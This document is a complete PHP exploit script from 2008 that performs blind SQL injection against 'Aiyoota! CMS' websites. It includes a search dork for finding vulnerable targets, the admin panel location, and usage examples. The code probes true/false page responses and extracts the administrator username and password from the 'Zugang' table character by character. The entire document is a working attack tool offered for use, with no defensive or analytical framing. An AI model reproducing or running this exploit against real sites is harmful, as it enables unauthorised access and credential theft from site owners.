|
<?php ini_set("max_execution_time",0); ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); print_r(' ############################################################### # # Aiyoota! CMS - Blind SQL Injection Exploit # # Vulnerability discovered by: Lidloses_Auge # Exploit coded by: Lidloses_Auge # Greetz to: -=Player=- , Suicide, g4ms3, enco, # Palme, GPM, Free-Hack # Date: 16.12.2008 # ############################################################### # # Dork: inurl:naviid + inurl:liste9 # Admin Panel: [Target]/cms/ # Usage (Method 1 auto): php '.$argv[0].' -1 [Target] # Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file] # Example (Method 1) for http://www.site.com # => php '.$argv[0].' -1 http://www.site.com # Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html # => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html # ############################################################### '); $automatic = $argv[1]; $url = $argv[2]; if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) { if ($argv[1] == "-1") { $source = file_get_contents($url."/index.html"); $buffer = $source; if (strpos($source,"a href='$url/") != 0) { $place = strpos($source,"a href='$url/"); $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/")); $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'")); } else { while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") { $buffer = substr($buffer,strpos($buffer,"a href='/")); } $place = strpos($buffer, "a href='/"); $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/")); $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'")); } $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1; $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart; $part1 = substr($urlpart,0,$injplace); $part2 = substr($urlpart,$injplace); } elseif ($argv[1] == "-2") { $part1 = $url."/".$argv[3]."/".$argv[4]; $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7]; } echo "\nExploiting now!\n\n"; $true = file_get_contents($part1."+and+1=1".$part2); $false = file_get_contents($part1."+and+1=0".$part2); $inj = $false; $tbl = array("benutzer","passwort"); if (strlen($false) != strlen($true)) { for ($mode = 0; $mode <= 1; $mode++) { echo $tbl[$mode].": "; while ($break == 0) { $count++; $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2); $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2); $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2); $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2); $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2); if (strlen($false) / strlen($injpart1) * 100 < 98) { if (strlen($false) / strlen($injpart2) * 100 < 98) { $border1 = 103; $border2 = 122; } else { $border1 = 96; $border2 = 108; } } if (strlen($false) / strlen($injpart3) * 100 < 98) { if (strlen($false) / strlen($injpart4) * 100 < 98) { if (strlen($false) / strlen($injpart5) * 100 < 98) { $border1 = 47; $border2 = 57; } else { $border1 = 59; $border2 = 69; } } else { $border1 = 70; $border2 = 96; } } for ($i = $border1; $i<=$border2; $i++) { $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2); if (strlen($false) / strlen($zero) * 100 < 98) { $break = 1; echo "\n"; $i = $border2+1; } else { $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2); if ((strlen($inj) / strlen($true) * 100) < 98) { echo chr($i); $i = $border2+1; } } } } $break = 0; $count = 0; } } } else { echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n"; } ?>
|
|
|